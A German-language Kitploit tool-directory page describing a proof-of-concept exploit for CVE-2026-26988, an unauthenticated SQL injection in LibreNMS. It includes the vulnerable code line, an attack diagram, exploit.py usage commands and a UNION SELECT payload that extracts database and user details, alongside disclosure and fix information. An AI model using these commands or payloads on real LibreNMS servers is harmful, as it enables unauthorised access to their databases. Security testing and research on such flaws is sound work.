Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-26988-LibreNMS-SQLi — Proof-of-Concept-Exploit für eine nicht authentifizierte SQL-Injection in LibreNMS ajax_table.php, das zeitbasierte und boolesche Blind-Injection-Techniken für autorisierte Sicherheitstests demonstriert. | Kitploit
Tools/GitHubGitHub/mbanyamer/cve-2026-26988-librenms-sqli
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsLernen & Bildung
GitHubmbanyamer/cve-2026-26988-librenms-sqli

CVE-2026-26988-LibreNMS-SQLi

Proof-of-Concept-Exploit für eine nicht authentifizierte SQL-Injection in LibreNMS ajax_table.php, das zeitbasierte und boolesche Blind-Injection-Techniken für autorisierte Sicherheitstests demonstriert.

Repository anzeigen
vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Author Role Country Platform Vulnerability CVE CVSS Status

CVE-2026-26988 – LibreNMS Unauthenticated SQL Injection PoC

Unauthenticated SQL Injection in LibreNMS ajax_table.php über den IPv6-Adresssuchparameter.

  • Betroffene Versionen: LibreNMS ≤ 25.12.0
  • Behoben in: LibreNMS ≥ 26.1 (Commit 15429580baba03ed1dd377bada1bde4b7a1175a1)
  • CVSS v4.0: 9.3 Kritisch
    CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N
  • CWE: CWE-89 (Fehlende Neutralisierung spezieller Elemente in einem SQL-Befehl – SQL Injection)
  • Zusammenfassung der Schwachstelle

    Der Parameter address wird bei search_type=ipv6 anhand von / in Adresse und Präfix aufgeteilt.
    Der Präfix wird direkt ohne Escape in eine SQL-Abfrage eingefügt:

    root@kitploit:~
    $sql .= " AND ipv6_prefixlen = '$prefix'";
    

    Ein einfaches Anführungszeichen (') im Präfixteil ermöglicht das Ausbrechen aus dem String-Literal → beliebige SQL-Injection.

    Angriffsablauf-Diagramm

    root@kitploit:~
    flowchart TD
        A[Angreifer] -->|1. HTTP POST an /ajax_table.php| B[LibreNMS-Webserver]
        B -->|2. id=address-search & search_type=ipv6| C[Parameter address parsen]
        C -->|3. Aufteilung an '/' → $address / $prefix| D[Verwundbares SQL erstellen]
        D -->|4. Verkettung: ipv6_prefixlen = '$prefix'| E[MySQL / MariaDB]
        E -->|5. Injizierte Abfrage ausführen| F[Ergebnisse / Fehler / Verzögerung zurückgeben]
        F -->|6. Angreifer beobachtet Antwort / Timing| A
    
        subgraph "Injektionspunkt"
            D
        end
    
        style D fill:#ff4d4d,stroke:#333,stroke-width:2px,color:#fff
    

    Proof-of-Concept-Nutzung

    Voraussetzungen

    • Python 3.x
    • Bibliothek requests (pip install requests)

    Basistest (Syntaxfehler / 500)

    root@kitploit:~
    python3 exploit.py http://target/librenms --test
    

    Zeitbasierte Blind-Bestätigung (empfohlen)

    root@kitploit:~
    python3 exploit.py http://192.168.1.50/librenms --time
    

    → Wenn die Antwort >5–6 Sekunden dauert → verwundbar

    Boolescher Blind-Test

    root@kitploit:~
    python3 exploit.py http://target/librenms --boolean
    

    Beispiel für benutzerdefinierten Payload

    root@kitploit:~
    python3 exploit.py http://target/librenms --test --payload "64' UNION SELECT database(),user(),version() -- "
    

    Dateien in diesem Repository

    • exploit.py .............. Haupt-PoC-Skript (bei Bedarf von cve-2026-26988-poc.py umbenennen)
    • README.md ............... Diese Datei

    Verantwortungsvolle Offenlegung

    • Gemeldet: Februar 2026 (über GitHub Security Advisory)
    • Behoben in: Commit 15429580baba... → PR #18777
    • Advisory: https://github.com/librenms/librenms/security/advisories/GHSA-h3rv-q4rq-pqcv

    Rechtlicher & ethischer Hinweis

    Dieser Proof-of-Concept dient ausschließlich Bildungs- und autorisierten Sicherheitstestzwecken.

    Verwenden Sie diesen Code NICHT gegen ein System oder Netzwerk ohne ausdrückliche schriftliche Genehmigung des Eigentümers.
    Unbefugte Nutzung kann gegen Gesetze verstoßen, einschließlich (aber nicht beschränkt auf) den Computer Fraud and Abuse Act (CFAA) in den USA oder entsprechende Gesetze in Ihrem Land.

    Nutzung auf eigene Gefahr.


    Autor: Mohammed Idrees Banyamer
    Instagram: @banyamer_security
    Datum: 20. Februar 2026

    Tool herunterladen